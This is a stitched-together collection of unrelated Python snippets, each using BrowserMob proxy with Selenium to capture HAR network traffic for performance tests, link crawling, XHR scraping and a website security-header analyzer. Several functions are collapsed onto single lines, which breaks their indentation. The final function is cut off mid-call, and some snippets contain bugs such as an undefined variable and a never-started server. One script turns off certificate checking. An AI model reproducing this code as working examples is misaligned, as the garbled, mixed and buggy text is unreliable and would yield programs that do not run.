def setupdevices():
    """Start a BrowserMob proxy, wire it into a Firefox profile, and
    begin recording a HAR.

    Inputs: none.

    Returns:
        tuple: (Selenium Firefox driver, BrowserMob proxy client,
        BrowserMob server). The caller is responsible for shutting all
        three down.
    """
    # Bring up the BrowserMob server and ask it for a proxy port.
    server = Server("############/browsermob-proxy-2.0-beta-9/bin/browsermob-proxy")
    server.start()
    proxy = server.create_proxy()

    # Route a fresh Firefox profile through the proxy and open a HAR.
    profile = webdriver.FirefoxProfile()
    profile.set_proxy(proxy.selenium_proxy())
    proxy.new_har("________")

    # Launch the browser only after the capture has started.
    driver = webdriver.Firefox(firefox_profile=profile)
    return (driver, proxy, server)
def save_web_page_stats_to_har(url, webdriver_name, save_to_file):
    """Generate the HAR archive from an URL with the Selenium webdriver
    'webdriver_name', saving the HAR file to 'save_to_file'
    """
    # One dedicated BrowserMob server per call, proxying on a random free port.
    browsermob_server = Server(Config.browsermob_executable)
    browsermob_server.start()
    random_port = get_a_random_free_tcp_port()
    proxy_conn = browsermob_server.create_proxy({"port": random_port})
    # Helper (defined elsewhere) builds the requested webdriver routed
    # through the proxy.
    driver = create_selenium_webdriver(webdriver_name, proxy_conn)
    try:
        # Record headers as well as timings, then load the page.
        proxy_conn.new_har(url, options={'captureHeaders': True})
        driver.get(url)
        har_json = json.dumps(proxy_conn.har, ensure_ascii=False, indent=4,
                              separators=(',', ': '))
        # Save '.HAR' file
        # NOTE: `unicode` makes this Python-2-only code.
        with io.open(save_to_file + '.har', mode='wt', buffering=1,
                     encoding='utf8', errors='backslashreplace',
                     newline=None) as output_har_f:
            output_har_f.write(unicode(har_json))
        # Save '.PROF' file with profiling report (timings, sizes, etc)
        # NOTE(review): mode='wb' combined with newline=None is only valid
        # on Python 2's io.open semantics here — confirm if porting to 3.
        with io.open(save_to_file + '.prof', mode='wb', buffering=1,
                     newline=None) as prof_output:
            report_har_dictionary(proxy_conn.har, prof_output)
    finally:
        # Tear down proxy, server, and browser even on failure.
        proxy_conn.close()
        browsermob_server.stop()
        driver.quit()
def main(argv): init() parser = argparse.ArgumentParser() parser.add_argument('-u', action='store', dest='start_url', help='Set page URL', required=True) parser.add_argument('-c', action='store', dest='cookies_file', help='JSON file with cookies', required=False) parser.add_argument('-w', action='store', dest='webdriver_type', help='Set WebDriver type (firefox or phantomjs, firebox by default)', default="firefox", required=False) results = parser.parse_args() start_url = results.start_url cookies_file = results.cookies_file webdriver_type = results.webdriver_type allowed_domain = urlparse(start_url).netloc browsermobproxy_path = get_browsermobproxy_path() options = { 'port': 9090, } server = Server(browsermobproxy_path,options) server.start() proxy = server.create_proxy() if webdriver_type == "phantomjs": service_args = ['--proxy=localhost:9091','--proxy-type=http',] driver = webdriver.PhantomJS(service_args=service_args) driver.set_window_size(1440, 1024) else: profile = webdriver.FirefoxProfile() profile.set_proxy(proxy.selenium_proxy()) driver = webdriver.Firefox(firefox_profile=profile) proxy.new_har('woodpycker', options={'captureHeaders': True, 'captureContent': True}) driver.get(start_url) if not cookies_file is None: with open(cookies_file, 'rb') as fp: cookies = json.load(fp) for cookie in cookies: driver.add_cookie(cookie) driver.refresh() links = driver.find_elements_by_tag_name('a') lenl = len(links) for i in range(0,lenl): if links[i].is_displayed(): url = links[i].get_attribute('href') text = links[i].get_attribute('text') if url.find(allowed_domain) != -1: links[i].click() print "%s Clicked on the link '%s' with HREF '%s'" % (Fore.BLUE+"*"+Fore.RESET,Style.BRIGHT+text+Style.RESET_ALL,Style.BRIGHT+url+Style.RESET_ALL) show_status_codes(proxy.har,allowed_domain) driver.back() driver.refresh() links = driver.find_elements_by_tag_name('a') driver.quit() server.stop()
def setUp(self):
    """
    Start the browser with a browsermob-proxy instance for use by the test.
    You *must* call this in the `setUp` method of any subclasses before using the browser!

    Returns:
        None
    """
    try:
        # Start server proxy
        server = Server('browsermob-proxy')
        server.start()
        self.proxy = server.create_proxy()
        proxy_host = os.environ.get('BROWSERMOB_PROXY_HOST', '127.0.0.1')
        self.proxy.remap_hosts('localhost', proxy_host)
    except Exception:
        # Narrowed from a bare `except:` so KeyboardInterrupt/SystemExit
        # still propagate; any proxy-startup failure just skips the test.
        self.skipTest('Skipping: could not start server with browsermob-proxy.')

    # parent's setUp
    super(WebAppPerfReport, self).setUp()

    # Initialize vars
    self._page_timings = []
    self._active_har = False
    self._with_cache = False

    # Add one more cleanup for the server
    self.addCleanup(server.stop)
def CaptureNetworkTraffic(url, server_ip, headers, file_path):
    '''
    This function can be used to capture network traffic from the browser.
    Using this function we can capture header/cookies/http calls made from the
    browser.

    url         - Page url
    server_ip   - remap host to for specific URL
    headers     - this is a dictionary of the headers to be set
    file_path   - File in which HAR gets stored
    '''
    port = {'port': 9090}
    # Path to the BrowserMobProxy
    server = Server("G:\\browsermob\\bin\\browsermob-proxy", port)
    server.start()
    proxy = server.create_proxy()
    proxy.remap_hosts("www.example.com", server_ip)
    proxy.remap_hosts("www.example1.com", server_ip)
    proxy.remap_hosts("www.example2.com", server_ip)
    proxy.headers(headers)

    profile = webdriver.FirefoxProfile()
    profile.set_proxy(proxy.selenium_proxy())
    driver = webdriver.Firefox(firefox_profile=profile)

    new = {'captureHeaders': 'True', 'captureContent': 'True'}
    proxy.new_har("google", new)
    driver.get(url)

    # BUG FIX: the HAR must be fetched from the proxy BEFORE the server is
    # stopped — the original read `proxy.har` for the dump after
    # `server.stop()`, when the proxy's REST endpoint was already gone.
    har = proxy.har  # returns a HAR JSON blob
    server.stop()
    driver.quit()

    # Context manager guarantees the file is closed even if dumping fails.
    with open(file_path, 'w') as file1:
        json.dump(har, file1)
def get_driver(self, browser, start_beacon_url):
    """Launch BrowserMob, open a Firefox driver routed through it, start
    a HAR capture, and remember the beacon URL for later checks.

    Returns the Firefox webdriver instance.
    """
    bmp_server = Server(BROWSERMOB_LOCATION)
    bmp_server.start()
    self.proxy = bmp_server.create_proxy()

    # Firefox gets the proxy directly rather than via a profile.
    firefox = webdriver.Firefox(proxy=self.proxy.selenium_proxy())
    self.proxy.new_har()

    self.beacon_url = start_beacon_url
    return firefox
def pytest_runtest_setup(item):
    """Per-test setup hook: create a BrowserMob proxy for the test when the
    --bmp-test-proxy option is enabled and the test is not marked
    'skip_browsermob_proxy'."""
    logger = logging.getLogger(__name__)
    if item.config.option.bmp_test_proxy and 'skip_browsermob_proxy' not in item.keywords:
        # Reuse a session-wide server when one was already attached to the
        # session config; otherwise build one from the CLI options.
        if hasattr(item.session.config, 'browsermob_server'):
            server = item.session.config.browsermob_server
        else:
            # NOTE(review): this freshly constructed Server is never
            # `start()`ed here — presumably the session fixture starts it
            # elsewhere; confirm, or create_proxy() below will fail.
            server = Server(item.config.option.bmp_path,
                            {'port': int(item.config.option.bmp_port)})
        item.config.browsermob_test_proxy = server.create_proxy()
        logger.info('BrowserMob test proxy started (%s:%s)'
                    % (item.config.option.bmp_host,
                       item.config.browsermob_test_proxy.port))
        # Project helper applies blacklists/limits etc. from the config.
        configure_browsermob_proxy(item.config.browsermob_test_proxy, item.config)
        #TODO make recording of har configurable
        item.config.browsermob_test_proxy.new_har()
def init_proxy_server(self, port=None):
    """Start the local BrowserMob server and create one proxy on it.

    The optional `port` plus any configured upstream (chained) proxy and
    credentials are forwarded to create_proxy(). Returns (server, proxy).
    """
    params = {}
    if port is not None:
        params['port'] = port
    # Chain through an upstream proxy when configured; key depends on
    # whether the upstream is HTTPS.
    if self.chained_proxy is not None:
        upstream_key = 'httpsProxy' if self.is_https else 'httpProxy'
        params[upstream_key] = self.chained_proxy
    if self.proxy_username is not None:
        params['proxyUsername'] = self.proxy_username
    if self.proxy_password is not None:
        params['proxyPassword'] = self.proxy_password

    server = Server('C://browsermob-proxy//bin//browsermob-proxy.bat',
                    options={"port": self.server_port})
    server.start()
    proxy = server.create_proxy(params=params)
    return server, proxy
def main(): init() if len(sys.argv) >= 2: start_url = sys.argv[1] else: print "You must specify page URL!" sys.exit() allowed_domain = urlparse(start_url).netloc browsermobproxy_path = "/usr/local/opt/browsermobproxy/bin/browsermob-proxy" options = { 'port': 9090, } server = Server(browsermobproxy_path,options) server.start() proxy = server.create_proxy() profile = webdriver.FirefoxProfile() profile.set_proxy(proxy.selenium_proxy()) driver = webdriver.Firefox(firefox_profile=profile) driver.get(start_url) links = driver.find_elements_by_tag_name('a') lenl = len(links) for i in range(0,lenl): if links[i].is_displayed(): url = links[i].get_attribute('href') text = links[i].get_attribute('text') if url.find(allowed_domain) != -1: proxy.new_har('demo') links[i].click() print "%s Clicked on the link '%s' with HREF '%s'" % (Fore.BLUE+"*"+Fore.RESET,Style.BRIGHT+text+Style.RESET_ALL,Style.BRIGHT+url+Style.RESET_ALL) show_status_codes(proxy.har,allowed_domain) driver.back() driver.refresh() links = driver.find_elements_by_tag_name('a') driver.quit() server.stop()
def fetch(url, config, output_directory, fetchEngine="browsermobproxy+selenium", browser="firefox"):
    """Fetch `url` and write a HAR file into `output_directory`.

    fetchEngine: 'phantomjs'/'ph' shells out to the configured PhantomJS
    command; 'browsermobproxy+selenium'/'bs' drives a real browser
    ('firefox'/'ff' or Chrome) through a BrowserMob proxy.

    Returns the written file name, or None when no data was captured.
    Fix over the original: the output file is written via a context
    manager so the handle cannot leak if the write fails.
    """
    if fetchEngine in ("phantomjs", "ph"):
        # PhantomJS command template has "$url" substituted in.
        data = subprocess.check_output(
            config['fetchEngines']['phantomjs_command'].replace("$url", url),
            shell=True
        )
    elif fetchEngine in ("browsermobproxy+selenium", "bs"):
        from browsermobproxy import Server
        from selenium import webdriver
        server = Server(config['fetchEngines']['browsermobproxy_binary'])
        server.start()
        proxy = server.create_proxy()
        if browser in ("firefox", "ff"):
            profile = webdriver.FirefoxProfile()
            profile.set_proxy(proxy.selenium_proxy())
            driver = webdriver.Firefox(firefox_profile=profile)
        else:
            chrome_options = webdriver.ChromeOptions()
            chrome_options.add_argument("--proxy-server={0}".format(proxy.proxy))
            driver = webdriver.Chrome(chrome_options=chrome_options)
        proxy.new_har(url, options={'captureHeaders': True})
        driver.get(url)
        data = json.dumps(proxy.har, ensure_ascii=False)
        server.stop()
        driver.quit()
    else:
        sys.exit("Unrecognized engine.")

    if data:
        fileName = (output_directory + "/"
                    + url.replace("http://", "").replace("https://", "")
                    + "_" + strftime("%Y-%m-%d_%H:%M:%S", gmtime()) + ".har")
        with open(fileName, "w") as f:
            f.write(data.encode("utf8"))
        return fileName
    else:
        return None
class CreateHar(object):
    """create HTTP archive file"""

    def __init__(self, mob_path):
        """initial setup

        mob_path: path to the browsermob-proxy binary; server/driver/proxy
        stay None until start_all() is called.
        """
        self.browser_mob = mob_path
        self.server = self.driver = self.proxy = None

    @staticmethod
    def __store_into_file(title, result):
        """store result

        Fixed to use a context manager so the file handle is closed even
        if the write raises (the original leaked it on error).
        """
        with open(title + '.har', 'w') as har_file:
            har_file.write(str(result))

    def __start_server(self):
        """prepare and start server"""
        self.server = Server(self.browser_mob)
        self.server.start()
        self.proxy = self.server.create_proxy()

    def __start_driver(self):
        """prepare and start driver"""
        profile = webdriver.FirefoxProfile()
        profile.set_proxy(self.proxy.selenium_proxy())
        self.driver = webdriver.Firefox(firefox_profile=profile)

    def start_all(self):
        """start server and driver"""
        self.__start_server()
        self.__start_driver()

    def create_har(self, title, url):
        """start request and parse response"""
        self.proxy.new_har(title)
        self.driver.get(url)
        result = json.dumps(self.proxy.har, ensure_ascii=False)
        self.__store_into_file(title, result)

    def stop_all(self):
        """stop server and driver"""
        self.server.stop()
        self.driver.quit()
def get_driver_and_proxy():
    """Return the module-global (driver, proxy) pair, creating them on
    first call. HAR collection and headless display are both opt-in via
    the module-level `config` dict."""
    global display
    global driver
    global proxy
    if not driver:
        # Start a BrowserMob proxy only when HAR collection is enabled.
        # NOTE(review): the local `server` handle escapes this scope, so
        # nothing can ever call server.stop() — confirm whether teardown
        # is handled elsewhere.
        if int(config.get('browsermob', {}).get('collect-har', 0)):
            from browsermobproxy import Server
            server = Server(config['browsermob']['path'])
            server.start()
            proxy = server.create_proxy()
        # Headless mode runs the browser inside a virtual display
        # (presumably pyvirtualdisplay's Display — confirm import site).
        if int(config.get('xconfig', {}).get('headless', 0)):
            display = Display(visible=0, size=(800, 600))
            display.start()
        profile = webdriver.FirefoxProfile()
        if proxy:
            profile.set_proxy(proxy.selenium_proxy())
        driver = webdriver.Firefox(firefox_profile=profile)
        driver.implicitly_wait(60)
    return driver, proxy
class Proxy(object):
    """Wraps a BrowserMob server + proxy pair for one test run; the HAR
    is named after (and dumped to) the test id."""

    # Class-level defaults; instances overwrite these on construction.
    proxy = None
    proxy_server = None
    test_id = None

    def __init__(self, test_id):
        self.test_id = test_id
        self.start_proxy()

    def start_proxy(self):
        """Start the server/client, apply the configured blacklist, and
        open a HAR named after the test id. Returns self."""
        self.proxy_server = Server(config.proxy_bin)
        self.proxy_server.start()
        self.proxy = self.proxy_server.create_proxy()
        if config.blacklist:
            self.set_blacklist(config.blacklist)
        self.proxy.new_har(self.test_id)
        logger.debug('Browsermob proxy started.')
        return self

    def stop_proxy(self):
        """Dump the HAR to '<test_id>.har', stop the server, and clear
        the handles.

        Fix: removed a dead `data = json.dumps(...)` that re-serialized
        the entire HAR into an unused string.
        """
        filename = '{}.har'.format(self.test_id)
        with open(filename, 'w') as harfile:
            json.dump(self.proxy.har, harfile)
        self.proxy_server.stop()
        self.proxy = None
        self.proxy_server = None
        logger.debug('Browsermob proxy stopped. HAR created: {}'
                     .format(filename))

    def set_blacklist(self, domain_list):
        """Answer HTTP 404 for any request whose host matches one of the
        blacklisted domains."""
        for domain in domain_list:
            self.proxy.blacklist("^https?://([a-z0-9-]+[.])*{}*.*"
                                 .format(domain), 404)
        logger.debug("Proxy blacklist set.")

    def get_blacklist(self):
        """Fetch the proxy's current blacklist via its REST API."""
        return requests.get('{}{}/blacklist'
                            .format(config.proxy_api, self.proxy.port))
class ad_driver(): _driver = None _server = None _proxy = None def __init__(self, path_to_batch, browser="chrome"): """ start browsermob proxy """ self._server = Server(path_to_batch) self._server.start() self._proxy = self._server.create_proxy() """ Init browser profile """ if browser is "chrome": PROXY = "localhost:%s" % self._proxy.port # IP:PORT or HOST:PORT chrome_options = webdriver.ChromeOptions() chrome_options.add_argument('--proxy-server=%s' % PROXY) self._driver = webdriver.Chrome(chrome_options=chrome_options) elif browser is "ff": profile = webdriver.FirefoxProfile() driver = webdriver.Firefox(firefox_profile=profile, proxy=proxy) else: print "Please set 'browser' variable to any of the value \n 'chrome', 'ff' !" self._driver.maximize_window() self._driver.implicitly_wait(20) def execute(self, test): self._proxy.new_har(test["name"]) self._driver.get(_test_data_dir + os.sep + test['file']) time.sleep(2) callToTestMethod = getattr(test_steps, test["name"]) callToTestMethod(self._driver) har = self._proxy.har requests = har['log']['entries'] return requests def quit(self): self._server.stop() self._driver.quit()
def _setup_proxy_server(self, downstream_kbps=None, upstream_kbps=None, latency=None):
    """Start a BrowserMob server + proxy, optionally applying bandwidth
    and latency limits. Returns (server, proxy).

    Idiom fix: `if len(proxy_options.items()) > 0` replaced with a plain
    truthiness check on the dict.
    """
    server = Server(BROWSERMOB_PROXY_PATH)
    server.start()
    proxy = server.create_proxy()

    # The proxy server is pretty sluggish, setting the limits might not
    # achieve the desired behavior.
    proxy_options = {}
    if downstream_kbps:
        proxy_options['downstream_kbps'] = downstream_kbps
    if upstream_kbps:
        proxy_options['upstream_kbps'] = upstream_kbps
    if latency:
        proxy_options['latency'] = latency

    if proxy_options:
        proxy.limits(proxy_options)

    return server, proxy
class BrowserMobProxyTestCaseMixin(object):
    """Mixin that manages a BrowserMob server for Marionette-based tests
    and points Firefox's proxy prefs (via Preferences.jsm) at it."""

    def __init__(self, *args, **kwargs):
        # NOTE(review): the popped kwargs are consumed here but *args and
        # the remaining **kwargs are never forwarded to super().__init__;
        # confirm the cooperating base classes expect that.
        self.browsermob_server = None
        self.browsermob_port = kwargs.pop('browsermob_port')
        self.browsermob_script = kwargs.pop('browsermob_script')

    def setUp(self):
        # Start one server per test; the port is optional, the script
        # path is mandatory.
        options = {}
        if self.browsermob_port:
            options['port'] = self.browsermob_port
        if not self.browsermob_script:
            raise ValueError('Must specify --browsermob-script in order to '
                             'run browsermobproxy tests')
        self.browsermob_server = Server(
            self.browsermob_script, options=options)
        self.browsermob_server.start()

    def create_browsermob_proxy(self):
        """Create a proxy on the running server and configure Firefox
        (through chrome-context script) to route HTTP/SSL through it."""
        client = self.browsermob_server.create_proxy()
        with self.marionette.using_context('chrome'):
            self.marionette.execute_script("""
                Components.utils.import("resource://gre/modules/Preferences.jsm");
                Preferences.set("network.proxy.type", 1);
                Preferences.set("network.proxy.http", "localhost");
                Preferences.set("network.proxy.http_port", {port});
                Preferences.set("network.proxy.ssl", "localhost");
                Preferences.set("network.proxy.ssl_port", {port});
            """.format(port=client.port))
        return client

    def tearDown(self):
        # Idempotent: safe to call from both tearDown and __del__.
        if self.browsermob_server:
            self.browsermob_server.stop()
            self.browsermob_server = None

    # Ensure the external server process is reaped even if tearDown is
    # never called.
    __del__ = tearDown
class BrowserMobProxyTestCaseMixin(object):
    """Variant of the BrowserMob mixin that sets Firefox's proxy prefs
    through Services.prefs instead of Preferences.jsm."""

    def __init__(self, *args, **kwargs):
        # NOTE(review): *args and leftover **kwargs are not forwarded to
        # super().__init__ — confirm the MRO partners tolerate this.
        self.browsermob_server = None
        self.browsermob_port = kwargs.pop('browsermob_port')
        self.browsermob_script = kwargs.pop('browsermob_script')

    def setUp(self):
        # One server per test; script path is required, port optional.
        options = {}
        if self.browsermob_port:
            options['port'] = self.browsermob_port
        if not self.browsermob_script:
            raise ValueError('Must specify --browsermob-script in order to '
                             'run browsermobproxy tests')
        self.browsermob_server = Server(
            self.browsermob_script, options=options)
        self.browsermob_server.start()

    def create_browsermob_proxy(self):
        """Create a proxy and point Firefox's HTTP/SSL proxy prefs at it
        via a chrome-context script."""
        client = self.browsermob_server.create_proxy()
        with self.marionette.using_context('chrome'):
            self.marionette.execute_script("""
                Services.prefs.setIntPref('network.proxy.type', 1);
                Services.prefs.setCharPref('network.proxy.http', 'localhost');
                Services.prefs.setIntPref('network.proxy.http_port', %(port)s);
                Services.prefs.setCharPref('network.proxy.ssl', 'localhost');
                Services.prefs.setIntPref('network.proxy.ssl_port', %(port)s);
            """ % {"port": client.port})
        return client

    def tearDown(self):
        # Idempotent so __del__ can alias it safely.
        if self.browsermob_server:
            self.browsermob_server.stop()
            self.browsermob_server = None

    __del__ = tearDown
def create_hars(urls, browsermob_dir, run_cached): for url in urls: print 'starting browsermob proxy' server = Server('{}/bin/browsermob-proxy'.format(browsermob_dir)) server.start() proxy = server.create_proxy() profile = webdriver.FirefoxProfile() profile.set_proxy(proxy.selenium_proxy()) driver = webdriver.Firefox(firefox_profile=profile) url_slug = slugify(url) proxy.new_har(url_slug) print 'loading page: {}'.format(url) driver.get(url) har_name = '{}-{}.har'.format(url_slug, time.time()) print 'saving HAR file: {}'.format(har_name) save_har(har_name, proxy.har) if run_cached: url_slug = '{}-cached'.format(slugify(url)) proxy.new_har(url_slug) print 'loading cached page: {}'.format(url) driver.get(url) har_name = '{}-{}.har'.format(url_slug, time.time()) print 'saving HAR file: {}'.format(har_name) save_har(har_name, proxy.har) driver.quit() print 'stopping browsermob proxy' server.stop()
def main():
    """Config-driven UI test harness: loads YAML config, optionally
    records traffic through a BrowserMob proxy, runs the configured TEST
    entries with unittest, and writes an HTML report."""
    global proxy_client, proxy_server
    LOG_FORMAT = "%(asctime)s - %(levelname)s - %(message)s"
    log_filename = 'logs/test_' + time.strftime("%Y%m%d", time.localtime()) + '.log'
    logging.basicConfig(filename=log_filename, level=logging.INFO, format=LOG_FORMAT)

    # Directory containing this script.
    curpath = os.path.dirname(os.path.realpath(__file__))

    # Global (shared) config file.
    # NOTE(review): `gf` and `f` below are opened but never closed —
    # consider `with open(...)` when this block is next touched.
    global_config = {}
    global_config_file_path = curpath + "/config.yaml"
    if os.path.isfile(global_config_file_path):
        gf = open(global_config_file_path, 'r', encoding='utf-8')
        global_config = yaml.safe_load(gf.read())

    # Was a per-run config name passed on the command line?
    if len(sys.argv) > 1:
        test_filename = sys.argv[1]
        config_file = "/config/" + test_filename + ".yaml"
    else:
        test_filename = 'default'
        config_file = "/config/" + test_filename + '.yaml'

    # Bail out (exit code 1) when the YAML config does not exist.
    config_file_path = curpath + config_file
    if not os.path.isfile(config_file_path):
        print("配置文件不存在 " + config_file_path)
        return 1
    f = open(config_file_path, 'r', encoding='utf-8')
    config = yaml.safe_load(f.read())
    # Merge run config over the global config (project helper).
    config = Util.recursionMergeTwoDict(global_config, config)

    # Should traffic be recorded through a BrowserMob proxy?
    is_open_proxy = config.get('BROWSER').get('proxy')
    if is_open_proxy:
        from browsermobproxy import Server
        bmp_path = config.get('BROWSER').get('bmp_path')
        logging.info('开启代理 ' + bmp_path)
        proxy_server = Server(bmp_path)
        proxy_server.start()
        proxy_client = proxy_server.create_proxy()

    # Build the requested browser; only Firefox and Chrome are supported.
    browser_type = config.get('BROWSER').get('type')
    if browser_type == 'Firefox':
        options = FirefoxOptions()
        options.page_load_strategy = 'normal'
        if is_open_proxy:
            options.add_argument('--proxy-server={0}'.format(
                proxy_client.proxy))
        browser = webdriver.Firefox(options=options)
    elif browser_type == 'Chrome':
        options = ChromeOptions()
        options.page_load_strategy = 'normal'
        if is_open_proxy:
            options.add_argument('--proxy-server={0}'.format(
                proxy_client.proxy))
        browser = webdriver.Chrome(options=options)
    else:
        print('浏览器' + browser_type + ':类型不支持')
        return False
    logging.info('开始使用 ' + browser_type + ' 浏览器进行自动化测试')

    # Start a HAR capture (headers + bodies) before the first page load.
    if is_open_proxy:
        proxy_client.new_har("req", options={
            'captureHeaders': True,
            'captureContent': True
        })
    browser.maximize_window()
    # Implicit browser wait (disabled).
    # browser.implicitly_wait(10)
    url = config.get('WEBSITE').get('url')
    browser.get(url)
    if is_open_proxy:
        Http.logHar(proxy_client.har)

    # Build a unittest suite from every configured TEST entry.
    test = config.get('TEST')
    suite = unittest.TestSuite()
    for key in test:
        menus = Menu.getMenuConfig(config, key)
        try:
            # The proxy client is passed into the test only when enabled.
            if is_open_proxy:
                test_data = [browser, menus, proxy_client]
            else:
                test_data = [browser, menus]
            suite.addTest(
                ParametrizedTestCase.parametrize(Action, 'test_menu',
                                                 param=test_data))
        # NOTE(review): `AssertExcetion` is spelled this way at its
        # definition site, presumably — confirm before renaming.
        except AssertExcetion:
            print(key + " 断言失败")

    # Emit the HTML report, then tear everything down.
    report_file_name = 'reports/' + test_filename + "_" + time.strftime(
        "%Y%m%d", time.localtime()) + '.html'
    fp = open(report_file_name, 'w', encoding='utf-8')
    runner = HTMLTestRunner.HTMLTestRunner(stream=fp,
                                           title='你的测试报告',
                                           description='使用配置文件:' +
                                           config_file_path + '生成的测试报告')
    runner.run(suite)
    fp.close()
    sleep(5)
    browser.quit()
    if is_open_proxy:
        proxy_client.close()
        proxy_server.stop()
# Flat script: record a HAR of universalorlando.com through a local
# BrowserMob proxy using Firefox.
from selenium import webdriver
from browsermobproxy import Server
import os
import json
from urllib.parse import urlparse
import time
from selenium.webdriver.common.action_chains import ActionChains
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as ec
import pprint

# Start the BrowserMob server (binary path left blank here) and a proxy
# that does not validate upstream TLS certificates.
server = Server("")
server.start()
proxy = server.create_proxy(params={"trustAllServers": "true"})
chromedriver = ""
#os.environ["webdriver.chrome.driver"] = chromedriver

# proxy.proxy is "host:port"; with no scheme, urlparse places the whole
# string in .path, so `url` ends up as the proxy address.
url = urlparse(proxy.proxy).path

#chrome_options = webdriver.ChromeOptions()
chrome_options = webdriver.FirefoxOptions()
chrome_options.add_argument('ignore-certificate-errors')
chrome_options.add_argument("--proxy-server={0}".format(url))
#driver = webdriver.Chrome(chromedriver, chrome_options=chrome_options)
# NOTE(review): both arguments are passed positionally to
# webdriver.Firefox — the empty `chromedriver` string lands in the first
# positional slot; confirm this matches the installed Selenium version's
# Firefox() signature.
driver = webdriver.Firefox(chromedriver, chrome_options)

# Begin the HAR capture (with request/response headers) and load the page.
proxy.new_har("universalorlando.com", options={'captureHeaders': True})
driver.get("https://www.universalorlando.com/")
#fastrack2 = WebDriverWait(driver, 10).until(ec.visibility_of_element_located((By.XPATH, '//*[@id="btn-1"]')))
class Monitor(object):
    """Pairs a Chrome webdriver with a BrowserMob proxy so XHR response
    bodies can be read back from the recorded HAR.

    step 3: configure the chromedriver and browsermob-proxy paths. Full
    paths are required, otherwise browsermob-proxy fails to start; both
    binaries live next to monitor.py here. Chrome is set to block images
    (tweak CHROME_OPTIONS to capture them).
    """

    PROXY_PATH = path.abspath(
        r"D:\Anaconda3\browsermob-proxy-2.1.4\bin/browsermob-proxy.bat")
    CHROME_PATH = path.abspath(r"D:\Anaconda3\chromedriver.exe")
    CHROME_OPTIONS = {"profile.managed_default_content_settings.images": 2}

    def __init__(self):
        """No-op initializer; call start() to bring everything up."""
        pass

    def initProxy(self):
        """step 4: start browsermob-proxy, blacklist css/jpg/png/gif
        (Chrome's own image setting sometimes fails) to speed up page
        loads, and create the proxy client."""
        self.server = Server(self.PROXY_PATH)
        self.server.start()
        self.proxy = self.server.create_proxy()
        self.proxy.blacklist([
            "http://.*/.*.css.*", "http://.*/.*.jpg.*", "http://.*/.*.png.*",
            "http://.*/.*.gif.*"
        ], 200)

    def initChrome(self):
        """step 5: start selenium Chrome with its proxy pointed at the
        browsermob proxy created by initProxy()."""
        chromeSettings = webdriver.ChromeOptions()
        chromeSettings.add_argument('--proxy-server={host}:{port}'.format(
            host="localhost", port=self.proxy.port))
        chromeSettings.add_experimental_option("prefs", self.CHROME_OPTIONS)
        self.driver = webdriver.Chrome(executable_path=self.CHROME_PATH,
                                       chrome_options=chromeSettings)

    def genNewRecord(self, name="monitor", options=None):
        """step 6: start a new HAR record with content capture enabled.

        BUG FIX: the original used a mutable dict as the default value of
        `options`; the default is now built per call (same behavior).
        """
        if options is None:
            options = {'captureContent': True}
        self.proxy.new_har(name, options=options)

    def getContentText(self, targetUrl):
        """step 7: return the response body of the first HAR entry whose
        request URL fully matches the regex `targetUrl`, else None."""
        if self.proxy.har['log']['entries']:
            for loop_record in self.proxy.har['log']['entries']:
                try:
                    if re.fullmatch(targetUrl, loop_record["request"]['url']):
                        return loop_record["response"]['content']["text"]
                except Exception as err:
                    # Malformed entries are reported and skipped.
                    print(err)
                    continue
        return None

    def start(self):
        """step 8: bring-up order for the monitor."""
        try:
            self.initProxy()
            self.initChrome()
            print('初始化完成')
        except Exception as err:
            print(err)

    def quit(self):
        """step 9: teardown order. The proxy server may fail to exit
        cleanly; OS errors while killing its process are ignored."""
        self.driver.close()
        self.driver.quit()
        try:
            self.proxy.close()
            self.server.process.terminate()
            self.server.process.wait()
            self.server.process.kill()
        except OSError:
            pass
def analyze(site):
    """Run the full security-analysis pipeline for `site` and return a
    SuccessResult, or an ErrorResult wrapping any raised exception."""
    try:
        # Normalize away any scheme; phase 0 follows the plain-HTTP
        # redirect chain first.
        site = re.sub(r'^https?://', '', site)
        response = requests.get(f'http://{site}', timeout=10,
                                headers={'User-Agent': USER_AGENT_CHROME})
        redirected_hostname = urlparse(response.url).hostname
        redirected_site = re.sub(r'^https?://', '', response.url)
        # phase 0
        http_redirection_result = analyze_http_redirection(response)
        # phase 1
        tls_result = analyze_tls(redirected_hostname)
        # phase 2 — fetch over HTTPS with Chrome and IE user agents.
        response = requests.get(f'https://{redirected_site}', timeout=10,
                                headers={'User-Agent': USER_AGENT_CHROME})
        response_ie = requests.get(f'https://{redirected_site}', timeout=10,
                                   headers={'User-Agent': USER_AGENT_IE})
        response_headers = response.headers
        response_cookies = response.cookies
        response_url = response.url
        soup = BeautifulSoup(response.text, features='html.parser')
        # Load the page in headless Chrome behind a BrowserMob proxy so
        # the HAR lists every sub-request the page triggers.
        # NOTE(review): this teardown (proxy.close/server.stop/
        # driver.quit below) is not in a finally block, so an exception
        # mid-pipeline leaks the browser and proxy processes.
        server = Server(BROWSERMOB_PROXY_PATH)
        server.start()
        proxy = server.create_proxy()
        options = webdriver.ChromeOptions()
        options.add_argument(f'--proxy-server={proxy.proxy}')
        options.add_argument('--headless')
        driver = webdriver.Chrome(options=options)
        proxy.new_har()
        driver.get(f'https://{redirected_site}')
        har_entries = proxy.har['log']['entries']
        # Detect third-party JS libraries by executing a bundled script
        # in the page context.
        with open('libraries.js') as f:
            javascript = f.read()
        third_party_libs = driver.execute_script(javascript)
        proxy.close()
        server.stop()
        driver.quit()
        # Header-based checks (phase 2 continued).
        hsts_result = analyze_hsts(response_headers)
        hpkp_result = analyze_hpkp(response_headers)
        x_content_type_options_result = analyze_x_content_type_options(
            response_headers)
        x_xss_protection_result = analyze_x_xss_protection(response_headers)
        x_frame_options_result = analyze_x_frame_options(response_headers)
        x_download_options_result = analyze_x_download_options(
            response_ie.headers)
        expect_ct_result = analyze_expect_ct(response_headers)
        # phase 3 — cookie/CORS/CSP/CSRF and related policies.
        cookie_security_result = analyze_cookie_security(
            response_cookies, soup)
        cors_policy_result = analyze_cors_policy(response_headers,
                                                 response_url)
        csp_result = analyze_csp(redirected_site)
        csrf_result = analyze_csrf(response_cookies, soup)
        cors_result = analyze_cors(soup, har_entries)
        referrer_policy_result = analyze_referrer_policy(
            response_headers, response_url, soup, har_entries)
        cache_control_result = analyze_cache_control(response_headers, soup)
        leaking_server_software_info_result = analyze_leaking_server_software_info(
            response_headers)
        # phase 4 — content-level checks on the captured HAR and DOM.
        mixed_content_result = analyze_mixed_content(har_entries)
        sri_result = analyze_sri_protection(soup)
        cross_domain_existence_result = analyze_cross_domain_existence(
